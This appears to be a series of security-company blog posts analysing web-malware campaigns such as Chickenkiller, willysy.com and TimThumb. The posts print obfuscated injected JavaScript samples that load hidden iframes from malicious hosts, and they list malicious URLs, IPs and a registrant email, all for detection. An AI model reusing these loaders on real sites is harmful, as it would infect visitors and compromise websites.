Malicious hackers are continuously evolving the strategies they use to infect thousands of innocent and benign websites with malicious computer code, i.e. web malware.

Web malware is a relatively recent phenomenon and is quite different from the “standard” viruses and trojans that are known to infect PCs and servers.

How do I identify the malicious code?
A new strain of web malware has been making the rounds in the last few months. This particular infection has been nicknamed Chickenkiller. It is usually found with associated JavaScript obfuscated using the Dean Edwards Packer program.

An example is present below:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k1){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k1)}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookieh|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}));

This de-obfuscated code is easier to read:

function hDcd(data) {
        var b16_digits = "0123456789abcdef";
        var b16_map = new Array;
        for (var i = 0; i < 256; i++) {
            b16_map[b16_digits.charAt(i >> 4) + b16_digits.charAt(i & 15)] = String.fromCharCode(i);
        }
        if (!data.match(/^[a-f0-9]*$/i)) {
            return false;
        }
        if (data.length % 2) {
            data = "0" + data;
        }
        var ll = data.length;
        var result = new Array;
        var j = 0;
        for (var i = 0; i < ll; i += 2) {
            result[j++] = b16_map[data.substr(i, 2)];
        }
        return result.join("");
    }

    if (document.cookie.indexOf("cookieh=enabled") == -1) {
        document.write(hDcd("3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e"));
        document.cookie = "cookieh=enabled";
    }

Which sites are aiding the attack?
The malicious links associated with the “packed” JavaScript code are listed below.

hxxp://chicknercx43.chickenkiller.com/i.php?go=1
hxxp://zxr0.chickenkiller.com/kat3/gate.php
hxxp://bugs.chickenkiller.com:10/images/1.htm
hxxp://peacockog45g45.chickenkiller.com/

These links all resolve back to a single IP address. As you can see, the IP address and host were created with a malicious intent. It is an example of a site that has been deployed specifically to spread malware.

IP address:	77.232.70.33
Hostname:	bl4ckh4x0rs.com

The malware has infected many sites including those below.

phislin.com
827512.com
jinti.com
cnad.com
siwayishu.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security dean edwards packaer, iframe, malware, packer

Code injection attacks are now affecting millions of websites on the Internet. It is no longer an option to leave your website unprotected.

We will be discussing the major outbreak of the “willysy.com” injection attacks in this article that at one time affected more than 100,000 websites.

What is the Willysy attack?
This particular code injection attack leads to the injection of malicious Iframes by malicious hackers into benign websites. The Iframe is an HTML element that can be used to load content from a different website into the pages on your own website. Think of it as a shipping container that fits like a lego block on your ship, and the container can contain cargo from a source that you have no control over.

This Iframe element is used to load malware content from exploit sites after a benign website is compromised and an iframe is injected and embedded inside the webpage. When trusting visitors view these webpages, they are infected with the malware.

What vulnerabilities are being exploited?
osCommerce sites are being targeted primarily with this attack and the following vulnerabilities in osCommerce are being exploited:

• osCommerce Remote Edit Site Info Vulnerability
• osCommerce Online Merchant v2.2 File Disclosure And Admin ByPass

These exploits are used to infect benign, legitimate, sites. Once the malware is injected onto these exploited sites, the visitors to these sites are infected by various mechanisms used to install the malware on the visitors machine. Some of the mechanisms used to infect the visitors computer involve browser exploits like the ones listed below.

CVE-2010-1885
CVE-2010-0886
CVE-2010-0188
CVE-2006-0003

Is my website infected?
In order to determine whether your website is infected or not, search for instances of the malware listed below using tools like grep (or wingrep) or have StopTheHacker’s Health Monitoring service do it for you.

Search for the following malware:

<iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

Search for the following malware closely associated with the willysy.com infection:

<script src=hxxp://exero.eu/catalog/jquery.js></script>

If you see an occurrence of this malware on your website, your website has been compromised. You will need to clean up the infection by deleting the instances of the malware from your webpages.

Another indication of infection is to search your server log files for accesses from the IP addresses below. If you do find these IP addresses in your log files, you should pay special attention to determining whether your site has been compromised or not.

178.217.163.214
178.217.165.111
178.217.165.71

Additionally, if your site is using osCommerce you should be even more alert. Since this infection seems to be more prevalent amongst osCommerce websites, please download the latest version of osCommerce and ensure that the permissions of your admin folders are set correctly (to 644 or something more restrictive).

Which sites are aiding the attack?
The below list includes sites used to spread the malware thus far.

hxxp://arhyv.ru/
hxxp://papucky.eu/ext/
hxxp://counv.ru/
hxxp://adeportes.es/
hxxp://labource.ru/
hxxp://gooqlepics.com/include.js
hxxp://yandekapi.com/

Who owns these malicious sites?
The registrant for the malware disctibution site arhyv.ru is:

leshkinaira@yahoo.com

Source: Forum entry at DSLreports.com.

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security blacklisting, iframe, javascript, malware, willysy

The ability to integrate useful third party plugins into a CMS like WordPress provides website owners the ability to add new functionality to existing websites. Unfortunately, this feature comes at a price.

Third party plugins often have security vulnerabilities that allow malicious hackers to break into websites and use them to distribute malware. We take a look at a plugin called TimThumb in this article.

What is TimThumb?
TimThumb is a small PHP script for cropping, zooming, and resizing images (jpg, png, gif) on the web. It is used widely on blogs and in other applications.

The Problem
The main script associated with TimThumb is called Timthumb.php. This program allows a website owner to offer the visitors to a website, the ability to load images and resize them easily, while at the same time maintaining a cache of images to preserve bandwidth and speed loading.

It is this functionality which has been a target of the zero-day TimThumb attack. TimThumb allows users to load pictures from external sites and store them in a directory on the web server, which is a really attractive vector for hackers to use in an attack. Keep in mind though, TimThumb does not play any part in executing malicious code. TimThumb is merely being used as a delivery mechanism for the malware.

Storing externally sourced content in a web server directory which is publicly accessible is the root cause of this issue. The verification mechanism for storage of content and verification of its source is flawed in TimThumb. This flawed mechanism has allowed malicious hackers to distribute malicious code from many websites.

A very good writeup on this topic is presented here.

Analysis
The malware runs each time the page is loaded by the website visitor’s browser. Malicious advertisements are displayed to the user and a malicious redirection may occur (sites we listed in our recent post).

• A malicious script is often deposited in the cache directory (used by timthumb to store cached images)
  • The malicious scripts may be a c99/c100 shell
  • The malicious shells are web based – giving the malicious hacker remote control of your website, and hosting account
• Base 64 encoded malware is injected into wp-blog-header.php
• JavaScript files may be modified (l10n.js and jquery.js are primary targets)

A sample of the injected code:

var _0x4ab4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63..
\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37..
eval (function (_0x2f46x1,_0x2f46x2

How do I protect my site?
StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security iframe, malware, timthumb, vulnerability

The IFRAME element, part of the HTML specification, continues to be a favorite attack vector for malicious hackers. Loading malicious payload by means of an IFRAME is an extremely easy and effective. Attackers infect and compromise websites and use them to infect other websites by loading malware from external locations, like other hacked sites. Think of it as a chain of malware propagating from one infected website to another.

Since March 2011, one of the most popular IFRAME injection attack campaigns used the URLs we list below. We have recorded many websites infected by malware as part of this IFRAME injection attack.

What links are injected?
Some of the most popular pieces of malware are being injected in IFRAME elements.

Samples are listed below:

iframe src="hxxp://videoonlinefree.co.cc/hck"
iframe src="hxxp://quadmatrix.co.cc/download/" <!-- can be injected within a DIV -->
iframe src="hxxp://join4freemoney.co.cc/"
iframe src="hxxp://hentai-3d-gifs.co.cc"
iframe src="hxxp://Allisson-Lozz.co.cc"

Recent TimThumb hacks include the following malware links:

iframe src="hxxp://blluerebadunn.us.to/kwizhveo.php"
iframe src=“hxxp://sexyyjeannetteh.us.to/kwizhveo.php”
iframe src="hxxp://seeven71.us.to/kwizhveo.php"
iframe src="hxxp://gufmaurr79.us.to/kwizhveo.php"
iframe src="hxxp://cooldeliia97.us.to/kwizhveo.php"
iframe src="hxxp://bastalevarrga.us.to/kwizhveo.php"
iframe src="hxxp://sexyjju88.us.to/kwizhveo.php"
iframe src="hxxp://heidiheernande.us.to/kwizhveo.php"
iframe src="hxxp://blaackhatt58.us.to/kwizhveo.php"
iframe src="hxxp://coolerikpowwel.us.to/kwizhveo.php"
iframe src="hxxp://freeagcoll.us.to/kwizhveo.php"
iframe src=“hxxp://nightllup80.us.to/kwizhveo.php”
iframe src="hxxp://prettyrosseande.us.to/kwizhveo.php"

How do I protect my site?
Webmasters and administrators should search for instances of each malicious link in their sites to ensure that they remove all occurrences of the injected links. More importantly, it is critical to identify the vulnerability that allowed the site compromise and ultimately the IFRAME injection.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security iframe, injection, malware

Malware authors are constantly coming up with new ways to compromise web sites. Now the weakest link in the security chain, malicious hackers have started to focus on web sites, breaking in and then using them to distribute dangerous viruses. This spreads malware on PCs which are then used to form bot networks of compromised web sites. Customer data and the reputation of the web site and the online business is at stake. In this article, we will highlight a relatively new way that hackers can infect websites.

Apache Filter Based Malware
We have recently noted a new development in the world of web-malware. Malicious hackers have recently begun using the Apache Web Server’s filter module to inject malware into web pages. This process works in a similar way having the mailman stick a piece of gum (highly unlikely in real life) on the nice and clean envelope that you put into the mailbox. The recipient of the envelope might complain to you about the piece of gum (malware), and most people would be at a loss to determine whether it came from you.

This is exactly the confusion malicious hackers capitalize on. Apache is one of the most popular web server softwares in use today. This software is extremely flexible, scalable and very reliable. No wonder it is a good choice for webmasters, web hosts, website owners and such. Malicious hackers are banking on the popularity of Apache to provide them with the most bang for the buck.

Apache through its flexibility, offers programmers the ability to create “filters.” The job of a filter is to allow real time analysis and modification of web page data. For example, if you wanted to add an advertisement to every page served from the webserver, this functionality would be of great use. Now filters are being abused by malicious hackers. These filters are being used to insert a piece of malware containing an iframe like the one below.

This piece of malware leads to a fake AV site:

iframe src="http://crocabhysanr4.cz.cc/[scrubbed]"

Even though this is a relatively recent problem, researchers at Symantec have also reported on the same issue.

Nuances
To clarify , this new kind of malware injection does not imply that Apache is compromised or has vulnerabilities. The Apache “filter” functionality is a feature that is being exploited by malicious hackers who have gained unauthorized access to a web server. This attack is extremely effective, since it can “infect” every page on the web server without changing a single file.

In the past there have been other .htaccess based malware which try to evade detection by only serving infected web pages when a user visits the compromised site via a search engine like Google. This malware is much more sophisticated. It injects malware into outgoing HTML pages from the webserver, but only according to the following rules.

The malware is not injected into outgoing webpages if:

• The incoming HTTP request is coming from an IP which belongs to a search engine
• The incoming HTTP request is coming from certain browser User Agents
• The administrator is logged in or an administrator owned process is running

Additionally, the very first time a user requests a page a session token is created for the connection, but the malware is not delivered this first time. The malware is delivered the second time that the same user, using the same session, makes a request for a web page. Interestingly, this process only serves the malware only once and adds the IP address of the user to a list so that it does not try to infect the same host again and again. This helps the malware reduce its probability of detection by Anti-Virus.

We Can Help!
If you want to protect your site from infection, or you need additional support, please sign up for one of our services. Please contact us with your comments or questions.

Report, Security apache, blacklist, iframe, malware, suspicious code

Web based malware is quite interesting in the way it changes. This emerging threat can destroy the reputation of websites and online businesses, get them blacklisted by search engines and hurt their customers and visitors . Every single day, close to 6,600 new websites are added to popular malware blacklists. In this article, we will discuss the evolution of a particular piece of web-malware which is being used by hackers to avoid detection worldwide.

Web-malware is malicious computer code, like computer viruses, but injected into web pages on unsuspecting benign websites. The owners of these websites, for the most part, remain blissfully unaware that they are hurting their customers and visitors by infecting them with malware. By virtue of being party to the malware distribution network, these legitimate websites are ultimately blacklisted by search engines, various filters and end up inaccessible to their users until they are cleaned up. This leads to loss of revenue, loss of reputation and tremendous heartache.

Malware Evolution
We observe many new strains of web-malware everyday. One interesting strain, which has been recurring over the past year or so is presented in this article. We will show you how this strain of malware has “evolved.” The reason for this evolution is so that the malware can avoid detection by scanning systems.

The technology we use at Stopthehacker.com (STH) does not work like traditional Anti-Virus software, however. We can each version of malware, even though it may look and act a little differently from earlier versions. Scanning technology at STH uses Machine Learning and Artificial Intelligence techniques to hunt down malware and even spam on web pages. We protect the reputation of websites and prevent loss of business due to blacklisting.

Let’s look at each version of the web-malware below.

Version 1:
Also found on jsunpack.

<skript>var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var xM=function(){return 'xM'};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return 'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var nE='';var gT=new Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var gH=function(){};var e=false;}gG="gG";var cB=28236;var zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var jA=function(){};this.tH=false;var m=w;</skript>

Version 2:
Found on rexbd.net.

<span style="color:#0000BB"><skript></span>var WnmaQ={YYSXc:function(){l=<span style="color:#DD0000">&#039;&#039;</span>;var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS=<span style="color:#DD0000">"mS"</span>;var s=false;this.zN=false;var u=<span style="color:#DD0000">""</span>;var o = g.getMonth();var r = <span style="color:#DD0000">"from"</span> + g.getMonth() + <span style="color:#DD0000">"e"</span>;function t(){};d=<span style="color:#DD0000">&#039;&#039;</span>;r = r.replace(10, <span style="color:#DD0000">"CharCod"</span>);a=<span style="color:#DD0000">""</span>;this.bX=<span style="color:#DD0000">&#039;&#039;</span>; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA=<span style="color:#DD0000">""</span>;var x=false;for(var gP=0;gP <span style="color:#0000BB">< <span style="color:#007700">i.length;gP++){this.tT=false;var fU=<span style="color:#DD0000">"fU"</span>;this.nT=62782;var jC=<span style="color:#DD0000">&#039;&#039;</span>;var b=i[gP].cssRules||i[gP].rules;aV=<span style="color:#DD0000">""</span>;var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ=<span style="color:#DD0000">&#039;&#039;</span>;this.mB=29481;var xM=function(){return <span style="color:#DD0000">&#039;xM&#039;</span>};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return <span style="color:#DD0000">&#039;bG&#039;</span>};var p=<span style="color:#DD0000">"p"</span>;if(!q.selectorText.match(/#c(\d+)/))continue;var nE=<span style="color:#DD0000">&#039;&#039;</span>;var gT=new Array();w=q.style.backgroundImage.match(/url\(<span style="color:#DD0000">"?data\:[^,]*,([^"</span>)]+)<span style="color:#DD0000">"?\)/)[1];this.lE="</span><span style="color:#DD0000">";mG=41875;};var gH=function(){};var e=false;}gG="</span>gG<span style="color:#DD0000">";var cB=28236;var zE=55721;bJ=false;var j="</span><span style="color:#DD0000">";function jI(){};var cO=&#039;</span><span style="color:#DD0000">&#039;;c=function(){return {oZUd:"</span>split<span style="color:#DD0000">"}}().oZUd;gB="</span>gB<span style="color:#DD0000">";sG=48086;var jA=function(){};this.tH=false;var m=w;

Version 3:
Found on www.twosixandbrush.com (https://badwarebusters.org/main/itemview/24057).

<style>#c19{background:url(data:,8,17.5,29.5,38,36.5,20,43,14,6.5,46.5,49,23,15,6.5,6,6,14,14,29,14.5,45,22,27,7,32.5,51.5,44.5,25,13.5,40.5,8.5,14,15,4,11,20,11,34.5,15,43,47,15,7,9.5,3.5,21.5,20.5,24,14,28.5,26.5,13.5,19,7.5,9,29.5,13.5,26.5,8.5,9.5,33,14,18,25,18,38,3,18.5,9.5,40,32,33.5,42.5,38.5,23.5,14.5,6,7,13.5,38,19,33.5,20,5,27,12,12,8.5,2.5,14,42,38,20,20.5,18,30.5,12,44,16.5,13,8,29.5,43,44,14,11,16,38.5,22,42.5,3.5,32.5,23.5,9,25,5.5,5,5.5,6,11.5,49.5,44,41,25,12.5,3.5,45,24,42.5,9,8.5,43,16,40,52,33,3,25.5,41.5,30,28.5,44.5,5.5,16.5,14,26.5,38.5,29.5,11,6.5,19,36.5,34.5,26.5,34,20,27.5,5.5,6.5,19.5,20.5,16.5,15.5,13.5,7,9.5,25,23,10,14.5,32,23.5,28.5,49.5,23.5,19,5,12,27,2);}</style>   <skript>var WnmaQ={YYSXc:function(){l='';var  v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42,  57);this.mS="mS";var s=false;this.zN=false;var u="";var o =  g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r =  r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var  f=function(){};var i=document.styleSheets;zA="";var x=false;for(var  gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var  jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var  n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var  xM=function(){return 'xM'};var  q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return  'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var  nE='';var gT=new  Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var  gH=function(){};var e=false;}gG="gG";var cB=28236;var  zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return  {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var  jA=function(){};this.tH=false;var  m=w;

Analysis
Notice the difference in the variants. In the second example, the entire payload is wrapped with style information. This obfuscation is intended to fool scanners which analyze the code within the script tag. If they fail to make sense of the entire block of code as they will identify it as just another benign HTML style element. The third case is one where the payload is slightly outside the main block of malware code. In this situation the scanner must correlate the presence of the “pseudo-style” information with the actual malware code and mark the entire block as unsafe. The scanner technology at STH does exactly this.

Conclusion
Authors of web-malware are trying to hide their code. This may be the effect of increased capability in scanning technologies and a raised awareness among webmasters and web-surfers making it more difficult for malicious hackers to do their deeds. This is a good sign.

Till next time.

Report, Security iframe, malware, script, span, style

The growth of web-based malware continues unabated. Malware developers are targeting websites to distribute malicious viruses, Trojans and other harmful computer programs. This modern modus operandi banks on the fact that most websites have weak security and can be easily compromised. In fact even the top 15 financial institutions have vulnerabilities. In this article, we describe another relatively new trick that malware developers are using to avoid detection of their malicious code.

The Phenomenon
Website compromise is a growing trend. More than 6,600 new websites get hacked every single day and consequently become distributors of malware and are blacklisted as a result. These websites lose business and customer trust, not to mention that these compromised websites can become part of the chain of information theft.

Fake anti-virus advertisements have been around for a long time. Niels Provos of Google, posted a great article about this. Symantec (Norton) also published information on this trend. Malware authors are playing on the tendency of unsuspecting users to trust any software that says “Anti-Virus” or “Malware Scan” on it.

Web-Malware Posing as Norton Anti-Virus
This post does not simply discuss fake anti-virus posing as the real deal, but also the issue of web-malware with names similar to that of anti-virus software. We discuss the emerging trend of malware authors finding insecure websites to compromise using “code injection”. This mechanism involves injection of malicious computer code which is executed when the infected web page is viewed by the browser (Internet Explorer, Safari, Firefox, Opera, etc.) of the visitor to the website. The owner of the website is completely oblivious that such an attack has taken place. We present an example below of a piece of malicious code found on an unsuspecting website.

document.write'< cript src=http://ftmlive.com/[scrubbed]/nortonsw_[scrubbed].php></ cript>

This particular code was mined from a page on pinnaclevillas.com. The malware was found on ftmlive.com on 2010-11-06.

Conclusion
This was just one of the many examples of malware we see on a daily basis pretending that it is a legitimate piece of software. In this case, the code is using a naming convention where the file which actually loads the attack payload includes “nortonsw” in its name in the hope that an administrator or user will assume it’s a Norton Anti-Virus related file.

Interestingly, this naming convention is used by Norton’s Safe Web service where administrators must put up a page on their site with a name similar to “nortonsw_(unique code).html” for verification by Norton. It seems that malicious hackers are targeting the mechanism that Norton Safe Web uses to verify sites to cloak their malicious code. We have seen this use of familiar naming conventions to be on the rise.

Till next time… when we post more interesting code samples and analysis.

News, Report, Security iframe, javascript, malware, norton

Web-based malware is the new bane of the Internet. Malware developers have focused on using websites to distribute millions of copies of viruses, Trojans and other malicious computer programs. This modern modus operandi banks on the fact that a website’s security is weak and can be easily compromised. In this article we want to raise awareness about how malware developers are hiding their malicious code to prevent detection by website administrators and other software.

The Phenomenon
The number of websites getting hacked is a trend strengthening by the day. More than 6,600 new websites get hacked every single day and consequently become distributors of malware and are subsequently blacklisted. This results in lost business and customer trust, not to mention that these compromised websites can become part of the chain of information theft.

Attack patterns change hourly. Consider for example, that on any given day 200,000 samples of web-based malware are identified in websites on the Internet. Firewalls, Web Application Firewalls (WAFs) and other security software make it harder for hackers to penetrate website security, but given the sheer volume and variants of malware, it is impossible for these security vendors to deliver signatures in real-time.

Malware Posing as jQuery
One way hackers fly under the radar, while causing immense damage to visitors of compromised websites, is to make their malicious computer code look like trusted computer code developed by a reputed organization. We present an example below.

var jquery = eval('wjign&dxogwj.;e&v&a;l;'.replace(/[g&;jx]/g, ''));
jquery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x75\x56\x47\x34\x28\x66\x4d\x36\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x74\x44\x36\x42\x48\x28\x62\x62\x52\x35\x78\x29\x7b\x76\x61\x72\x20\x67\x33\x67\x39\x3d\x30\x3b\x76\x61\x72\x20\x66\x47\x50\x59\x44\x41\x53\x3d\x62\x62\x52\x35\x78\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x69\x4e\x49\x4a\x6b\x76\x6b\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x69\x4e\x49\x4a\x6b\x76\x6b\x3c\x66\x47\x50\x59\x44\x41\x53\x29\x7b\x67\x33\x67\x39\x2b\x3d\x70\x4b\x76\x35\x32\x28\x62\x62\x52\x35\x78\x2c\x69\x4e\x49\x4a\x6b\x76\x6b\x29\x2a\x66\x47\x50\x59\x44\x41\x53\x3b\x69\x4e\x49\x4a\x6b\x76\x6b\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\x28\x67\x33\x67\x39\x2b\x27\x27\x29\x3b\x7d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x70\x4b\x76\x35\x32\x28\x67\x51\x52\x2c\x7a\x72\x77\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x67\x51\x52\x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x7a\x72\x77\x29\x3b\x7d\x20\x20\x20\x74\x72\x79\x20\x7b\x76\x61\x72\x20\x73\x44\x30\x76\x6c\x78\x3d\x65\x76

This particular code was mined from a page on:

http://www.acc4arab.com/newsite/[scrubbed].shtml

This is just one of many examples of malware we see on a daily basis pretending to be a legitimate piece of software. In this case, the code is using a simple naming convention where the entire payload of the malware is assigned to a innocuous sounding variable whose name matches the name of a well known JavaScript framework used widely by developers: jQuery. In the past, we have seen hackers targeting jQuery, but in a slightly different manner. An interesting related post: Down the rabbit hole.

Protect Your Website
Website owners should take advantage of new emerging, website Health Monitoring solutions. This kind of new technology can scan websites without interruptions, is completely SaaS based and uses advanced Artificial Intelligence mechanisms to catch never-before-seen malware. This is a significant break from the way most traditional anti-virus software works. Simply scanning for signatures is not enough to detect the thousands of new malware variants. Consider for example that current anti-virus engines cannot detect web-based malware effectively.

Use of new scanning technology such as on-demand web scanning can help website owners protect their reputation and maintain business continuity.

Till next time…

Report, Security iframe, javascript, jquery, malware, obfuscation

Services like Posterous have changed the way Internet users post information about themselves, their likes, and their dislikes. Posterous follows a very simple model.

A user simply needs to send an email to post@posterous.com and they can attach files, such as music that they like, and post it to their personal page. Its very easy to use. You can literally create your own page with a single email. Posterous has already chalked up thousands of avid users.

Motivation
The goal of this article is to highlight how a service like Posterous needs to harden itself against misuse by malicious individuals and groups. We will be exploring some of the potential loopholes of the posterous model. We will not be discussing or revealing any exploit code.

Exploring this facet of services like Posterous helps uncover the various attack surfaces that malicious entities can use to compromise such an excellent service. Through this exercise, perhaps we can help services like Posterous improve upon their existing architecture.

Methodology
We will use the following metrics to determine the safety of Posterous’s current service.

1. Can we post with an email where the originating server IP does not match the sender’s domain?
2. Can we post a malicious link (hyperlink)?
3. Can we post a malicious iframe?
4. Can we post a malicious script?
5. Can we post a malicious binary?

Before we proceed, we will outline how the experiment was set up. A new account was set up using an email sent to Posterous (by new account, we imply a new blog post, not a registered user account).

Once the blog post was created we analyzed the it to see if the content in the outgoing email to Posterous was actually present in the blog post. If the content was in the post, we analyzed it to see whether it was modified or not. The experiment was conducted on Friday, July 9, 2010.

Analysis
Now we will describe the results of some of the tests that we conducted.

1. Can we post with an email where the originating server IP does not match the sender’s domain? Yes
2. Can we post a malicious link (hyperlink)? Yes and No
   • For unregistered accounts, it seems that a hyperlink is prefaced with http://emailusername-kb3zz.posterous.com/ so a malicious link will not be triggered.
   • For registered accounts, it seems you can put up links without this prefix. We have confirmed posting of malicious links with examples from Malware Patrol, Google’s Safe Browsing List and others.
   • Update: Gary Tan from Posterous let us know that they are using link pre-filtering and will be expanding their capabilities by incorporating more lists. This is good to hear.
3. Can we post a malicious iframe? Yes
   In fact an iframe can be posted from non-registered mode. This is a mechanism that a bad guy might try to exploit (screenshot attached below, of course, its a benign iframe).
   • Update: Gary Tan from Posterous let us know that they prevent iframe posts from taking up the full page by sanitizing size attributes, mitigating the main problem with iframes.
4. Can we post a malicious script? No
   Posterous scrubs scripts attached to the email and does not let them post to the blog. It remains to be seen though, if any malicious encoding would allow a script get through.
5. Can we post a malicious binary? Not tested

Note: No malicious content (iframes, scripts, binaries) was ever uploaded to the blog during testing.

Conclusions
We have seen that there are some attack vectors which malicious entities could employ against services like Posterous as a tool to spread malware: primarily, the use of iframes and malicious links.

Even if Posterous begins to pre-filter links, as we have shown in a previous article (Analyzing URL Shorteners), these services are a thorn in the side of security policies. Unfortunately, as each new service like Posterous comes to life on the Internet, so do new attack vectors for malicious entities.

Till next time…

Update: Gary Tan from Posterous was kind enough to swiftly reply back to our questions and provide good information (Monday, July 12, 2010). Our findings have been updated appropriately.
Read more…

Report, Security iframe, posterous, sanitization', scripts

This afternoon, a post on Badwarebusters.org reminded me of a somewhat interesting piece of malicious code I have not seen for some time. Our scanners flagged it as malware.

The original post is found here , answered by redleg on Badwarebusters.org.

This malware, found embedded in “eslpod.com/website/index.php”, is displayed below. The code has been slightly modified so as not to work as intended if loaded up and run in a browser.

<h4 id="Fl" style="display:none;">%64%6f%63%75%6d%65%6e%74%2e%77%72%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%22%68%74%74%70%3a%2f%2f%74%72%61%66%2e%74%72%61%6e%73%63%6f%6e%74%69%6e%65%6e%74%61%6c%2d%73%65%72%76%69%63%65%2e%67%2f%69%6e%64%65%78%2e%70%68%70%5c%22%20%73%74%79%6c%65%3d%5c%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%5c%22%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</h4>

<script>
ar aK=docume nt.getElem entById("Fl"), A x=ev al;
aK = aK.inne rHTML;
Ax(unescape(aK));
</script>

It is interesting to see how hackers are trying out new tricks to fool scanning systems. Most code-injection attacks deliver the payload directly within the script tags. Here, the case is slightly different. The individual has attempted to disguise the malicious payload as a simple web element inside the page by using Javascript and the getElementById function. The code then proceeds to execute the malicious payload.

The payload by itself is not so interesting. It has been known to appear in different variants before this particular example.

The payload is displayed below:

document.wri te("<ifra me src=\"hxxp://traff.tr anscon tin enta l-serv ice.org/i n dex.php\" style=\"dis play:none;\"></ifr me>");

The iframe referred to here refers to the following:

<!--LiveInternet counter-->
<script t ype="text/javascript">
<!--
document.write("<a href='hxxp://www.li veinte rnet.ru/click' "+
"target=_blank><img src='hxxp://cou nter.yad ro.ru/hit?t52.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
